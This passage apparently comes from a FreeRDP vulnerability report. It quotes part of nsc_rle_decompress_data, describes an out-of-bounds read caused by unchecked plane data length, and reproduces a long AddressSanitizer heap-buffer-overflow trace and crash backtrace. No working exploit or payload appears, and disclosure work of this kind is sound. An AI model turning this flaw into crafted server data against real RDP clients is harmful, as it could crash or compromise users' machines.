originalSize \= context\->OrgByteCount\[i\];

planeSize \= context\->PlaneByteCount\[i\];

if (planeSize \== 0)

{

if (context\->priv\->PlaneBuffersLength < originalSize)

return FALSE;

FillMemory(context\->priv\->PlaneBuffers\[i\], originalSize, 0xFF);

}

else if (planeSize < originalSize)

{

if (!nsc\_rle\_decode(rle, context\->priv\->PlaneBuffers\[i\],

context\->priv\->PlaneBuffersLength, originalSize))

return FALSE;

}

else

{

if (context\->priv\->PlaneBuffersLength < originalSize)

return FALSE;

CopyMemory(context\->priv\->PlaneBuffers\[i\], rle, originalSize);

}

rle += planeSize;

}

return TRUE;

}

In the nsc_rle_decompress_data function, Out-Of-Bounds Read occurs because it processes context->Planes without checking if it contains data of sufficient length.

**PoC**

Insufficient data for context->Planes may cause errors or crashes.

**Impact**

Out-Of-Bounds Read

**Asan**

    ==18171==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x616000080e3a at pc 0x000102ccb778 bp 0x00016f6f5320 sp 0x00016f6f4ad0
    READ of size 20 at 0x616000080e3a thread T5
        #0 0x102ccb774 in __asan_memcpy+0x37c (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4f774) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
        #1 0x101c03914 in nsc_rle_decompress_data+0x3bc (libfreerdp3.3.0.0.dylib:arm64+0x1b914) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #2 0x101c02b60 in nsc_process_message+0x3f8 (libfreerdp3.3.0.0.dylib:arm64+0x1ab60) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #3 0x101c3f3e8 in clear_decompress_nscodec+0xf0 (libfreerdp3.3.0.0.dylib:arm64+0x573e8) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #4 0x101c3dee8 in clear_decompress_subcodecs_data+0x1008 (libfreerdp3.3.0.0.dylib:arm64+0x55ee8) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #5 0x101c3851c in clear_decompress+0x11a0 (libfreerdp3.3.0.0.dylib:arm64+0x5051c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #6 0x101d44ba0 in gdi_SurfaceCommand_ClearCodec+0x6fc (libfreerdp3.3.0.0.dylib:arm64+0x15cba0) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #7 0x101d3bf20 in gdi_SurfaceCommand+0x564 (libfreerdp3.3.0.0.dylib:arm64+0x153f20) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #8 0x100f26118 in rdpgfx_decode+0x288 (libfreerdp-client3.3.0.0.dylib:arm64+0xaa118) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #9 0x100f0fafc in rdpgfx_recv_wire_to_surface_1_pdu+0x1760 (libfreerdp-client3.3.0.0.dylib:arm64+0x93afc) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #10 0x100f0d0e4 in rdpgfx_recv_pdu+0x5d4 (libfreerdp-client3.3.0.0.dylib:arm64+0x910e4) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #11 0x100f0bfd4 in rdpgfx_on_data_received+0x448 (libfreerdp-client3.3.0.0.dylib:arm64+0x8ffd4) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #12 0x100e8f428 in dvcman_call_on_receive+0x164 (libfreerdp-client3.3.0.0.dylib:arm64+0x13428) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #13 0x100e8f294 in dvcman_receive_channel_data+0x440 (libfreerdp-client3.3.0.0.dylib:arm64+0x13294) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #14 0x100e8bc7c in drdynvc_process_data+0x2c8 (libfreerdp-client3.3.0.0.dylib:arm64+0xfc7c) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #15 0x100e89ef0 in drdynvc_order_recv+0x334 (libfreerdp-client3.3.0.0.dylib:arm64+0xdef0) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #16 0x100e89934 in drdynvc_virtual_channel_event_data_received+0x498 (libfreerdp-client3.3.0.0.dylib:arm64+0xd934) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #17 0x100e8861c in drdynvc_virtual_channel_open_event_ex+0x1ac (libfreerdp-client3.3.0.0.dylib:arm64+0xc61c) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #18 0x101e3bc98 in freerdp_channels_data+0x5cc (libfreerdp3.3.0.0.dylib:arm64+0x253c98) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #19 0x101eed664 in freerdp_channel_process+0x6e0 (libfreerdp3.3.0.0.dylib:arm64+0x305664) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #20 0x101e9d74c in rdp_recv_tpkt_pdu+0x11e8 (libfreerdp3.3.0.0.dylib:arm64+0x2b574c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #21 0x101e9c50c in rdp_recv_pdu+0x34 (libfreerdp3.3.0.0.dylib:arm64+0x2b450c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #22 0x101e97d74 in rdp_recv_callback_int+0x1408 (libfreerdp3.3.0.0.dylib:arm64+0x2afd74) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #23 0x101e9689c in rdp_recv_callback+0x1d8 (libfreerdp3.3.0.0.dylib:arm64+0x2ae89c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #24 0x101ebd088 in transport_check_fds+0x51c (libfreerdp3.3.0.0.dylib:arm64+0x2d5088) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #25 0x101e9867c in rdp_check_fds+0x170 (libfreerdp3.3.0.0.dylib:arm64+0x2b067c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #26 0x101e33454 in freerdp_check_fds+0x1ac (libfreerdp3.3.0.0.dylib:arm64+0x24b454) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #27 0x101e33b24 in freerdp_check_event_handles+0x70 (libfreerdp3.3.0.0.dylib:arm64+0x24bb24) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #28 0x100a97130 in mac_client_thread+0x5a4 (MacFreeRDP:arm64+0x13130) (BuildId: 3a4e43fe04f43036ab9335815490e83b32000000200000000100000000000d00)
        #29 0x102745320 in thread_launcher thread.c:520
        #30 0x192413fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
        #31 0x2a5800019240ed9c  (<unknown module>)
    
    0x616000080e3a is located 2708 bytes after 550-byte region [0x616000080180,0x6160000803a6)
    allocated by thread T5 here:
        #0 0x102ccd5b0 in wrap_malloc+0x8c (libclang_rt.asan_osx_dynamic.dylib:arm64+0x515b0) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
        #1 0x101c0d188 in aligned_zgfx_malloc+0x18 (libfreerdp3.3.0.0.dylib:arm64+0x25188) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #2 0x101c0ad88 in zgfx_decompress+0x4ac (libfreerdp3.3.0.0.dylib:arm64+0x22d88) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #3 0x100f0bdbc in rdpgfx_on_data_received+0x230 (libfreerdp-client3.3.0.0.dylib:arm64+0x8fdbc) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #4 0x100e8f428 in dvcman_call_on_receive+0x164 (libfreerdp-client3.3.0.0.dylib:arm64+0x13428) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #5 0x100e8f294 in dvcman_receive_channel_data+0x440 (libfreerdp-client3.3.0.0.dylib:arm64+0x13294) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #6 0x100e8bc7c in drdynvc_process_data+0x2c8 (libfreerdp-client3.3.0.0.dylib:arm64+0xfc7c) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #7 0x100e89ef0 in drdynvc_order_recv+0x334 (libfreerdp-client3.3.0.0.dylib:arm64+0xdef0) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #8 0x100e89934 in drdynvc_virtual_channel_event_data_received+0x498 (libfreerdp-client3.3.0.0.dylib:arm64+0xd934) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #9 0x100e8861c in drdynvc_virtual_channel_open_event_ex+0x1ac (libfreerdp-client3.3.0.0.dylib:arm64+0xc61c) (BuildId: 776adf67bfdc356180bc0f4db402691032000000200000000100000000000d00)
        #10 0x101e3bc98 in freerdp_channels_data+0x5cc (libfreerdp3.3.0.0.dylib:arm64+0x253c98) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #11 0x101eed664 in freerdp_channel_process+0x6e0 (libfreerdp3.3.0.0.dylib:arm64+0x305664) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #12 0x101e9d74c in rdp_recv_tpkt_pdu+0x11e8 (libfreerdp3.3.0.0.dylib:arm64+0x2b574c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #13 0x101e9c50c in rdp_recv_pdu+0x34 (libfreerdp3.3.0.0.dylib:arm64+0x2b450c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #14 0x101e97d74 in rdp_recv_callback_int+0x1408 (libfreerdp3.3.0.0.dylib:arm64+0x2afd74) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #15 0x101e9689c in rdp_recv_callback+0x1d8 (libfreerdp3.3.0.0.dylib:arm64+0x2ae89c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #16 0x101ebd088 in transport_check_fds+0x51c (libfreerdp3.3.0.0.dylib:arm64+0x2d5088) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #17 0x101e9867c in rdp_check_fds+0x170 (libfreerdp3.3.0.0.dylib:arm64+0x2b067c) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #18 0x101e33454 in freerdp_check_fds+0x1ac (libfreerdp3.3.0.0.dylib:arm64+0x24b454) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #19 0x101e33b24 in freerdp_check_event_handles+0x70 (libfreerdp3.3.0.0.dylib:arm64+0x24bb24) (BuildId: dfac08ef9e293206a0f10afcf243820f32000000200000000100000000000d00)
        #20 0x100a97130 in mac_client_thread+0x5a4 (MacFreeRDP:arm64+0x13130) (BuildId: 3a4e43fe04f43036ab9335815490e83b32000000200000000100000000000d00)
        #21 0x102745320 in thread_launcher thread.c:520
        #22 0x192413fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
        #23 0x2a5800019240ed9c  (<unknown module>)
    
    Thread T5 created by T0 here:
        #0 0x102cc691c in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4a91c) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
        #1 0x1027423a0 in winpr_StartThread thread.c:568
        #2 0x102741a74 in CreateThread thread.c:650
        #3 0x100a96894 in -[MRDPView rdpStart:]+0x964 (MacFreeRDP:arm64+0x12894) (BuildId: 3a4e43fe04f43036ab9335815490e83b32000000200000000100000000000d00)
        #4 0x100a95ce4 in mfreerdp_client_start+0x488 (MacFreeRDP:arm64+0x11ce4) (BuildId: 3a4e43fe04f43036ab9335815490e83b32000000200000000100000000000d00)
        #5 0x100a89bbc in freerdp_client_start+0x190 (MacFreeRDP:arm64+0x5bbc) (BuildId: 3a4e43fe04f43036ab9335815490e83b32000000200000000100000000000d00)
        #6 0x1009c678c in -[AppDelegate applicationDidFinishLaunching:]+0x53c (MacFreeRDP:arm64+0x10000678c) (BuildId: c0debf5af29834acb3c97ff2be5d5c4932000000200000000100000000000d00)
        #7 0x1924e717c in __CFNOTIFICATIONCENTER_IS_CALLING_OUT_TO_AN_OBSERVER__+0x90 (CoreFoundation:arm64+0x7417c) (BuildId: 203e44018c2e3157a24b92f52551d43e32000000200000000100000000040d00)
        #8 0x8253800192582ee8  (<unknown module>)
        #9 0x640000192582e30  (<unknown module>)
        #10 0x13e0001924b84c8  (<unknown module>)
        #11 0xb048001934168f0  (<unknown module>)
        #12 0xcc04800195719154  (<unknown module>)
        #13 0x140f000195718f04  (<unknown module>)
        #14 0x655f800195716fa0  (<unknown module>)
        #15 0xdd07000195716b9c  (<unknown module>)
        #16 0x8c5c800193440b60  (<unknown module>)
        #17 0xbd580001934409c0  (<unknown module>)
        #18 0x5e2f800198819514  (<unknown module>)
        #19 0x731e800198818e40  (<unknown module>)
        #20 0x2d61000198811f14  (<unknown module>)
        #21 0xa41d00019bd4ab40  (<unknown module>)
        #22 0x4a66800195712044  (<unknown module>)
        #23 0xc87e800195710edc  (<unknown module>)
        #24 0x6e57000195705340  (<unknown module>)
        #25 0xab4f8001956dc790  (<unknown module>)
        #26 0xc06a0001009c6020  (<unknown module>)
        #27 0x1920bbf24  (<unknown module>)
        #28 0xe81f7ffffffffffc  (<unknown module>)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4f774) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00) in __asan_memcpy+0x37c
    Shadow bytes around the buggy address:
      0x616000080b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000080c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000080c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000080d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000080d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x616000080e00: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
      0x616000080e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000080f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000080f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000081000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x616000081080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==18171==ABORTING
    [16:29:49:388] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [fatal_handler]: Caught signal 'Abort trap: 6' [6]
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 0: 0   libwinpr3.3.0.0.dylib               0x00000001026a3558 winpr_execinfo_backtrace + 336
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 1: 1   libwinpr3.3.0.0.dylib               0x000000010269d090 winpr_backtrace + 24
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 2: 2   libwinpr3.3.0.0.dylib               0x000000010269d3ec winpr_log_backtrace_ex + 304
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 3: 3   libwinpr3.3.0.0.dylib               0x000000010269d2b0 winpr_log_backtrace + 44
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 4: 4   libfreerdp3.3.0.0.dylib             0x0000000101ca42c8 fatal_handler + 460
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 5: 5   libsystem_platform.dylib            0x0000000192442a24 _sigtramp + 56
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 6: 6   libsystem_pthread.dylib             0x0000000192413c28 pthread_kill + 288
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 7: 7   libsystem_c.dylib                   0x0000000192321ae8 abort + 180
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 8: 8   libclang_rt.asan_osx_dynamic.dylib  0x0000000102cf09b8 _ZN11__sanitizer6AtexitEPFvvE + 0
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 9: 9   libclang_rt.asan_osx_dynamic.dylib  0x0000000102cf0124 _ZN11__sanitizer22SetCheckUnwindCallbackEPFvvE + 0
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 10: 10  libclang_rt.asan_osx_dynamic.dylib  0x0000000102cd5658 _ZN6__asan16ErrorDescription5PrintEv + 0
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 11: 11  libclang_rt.asan_osx_dynamic.dylib  0x0000000102cd499c _ZN6__asan18ReportGenericErrorEmmmmbmjb + 1452
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 12: 12  libclang_rt.asan_osx_dynamic.dylib  0x0000000102ccb798 __asan_memcpy + 928
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 13: 13  libfreerdp3.3.0.0.dylib             0x0000000101c03918 nsc_rle_decompress_data + 960
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 14: 14  libfreerdp3.3.0.0.dylib             0x0000000101c02b64 nsc_process_message + 1020
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 15: 15  libfreerdp3.3.0.0.dylib             0x0000000101c3f3ec clear_decompress_nscodec + 244
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 16: 16  libfreerdp3.3.0.0.dylib             0x0000000101c3deec clear_decompress_subcodecs_data + 4108
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 17: 17  libfreerdp3.3.0.0.dylib             0x0000000101c38520 clear_decompress + 4516
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 18: 18  libfreerdp3.3.0.0.dylib             0x0000000101d44ba4 gdi_SurfaceCommand_ClearCodec + 1792
    [16:29:49:389] [18171:6f6f7000] [ERROR][com.freerdp.utils.signal] - [winpr_log_backtrace_ex]: 19: 19  libfreerdp3.3.0.0.dylib             0x0000000101d3bf24 gdi_SurfaceCommand + 1384

Tag

#chrome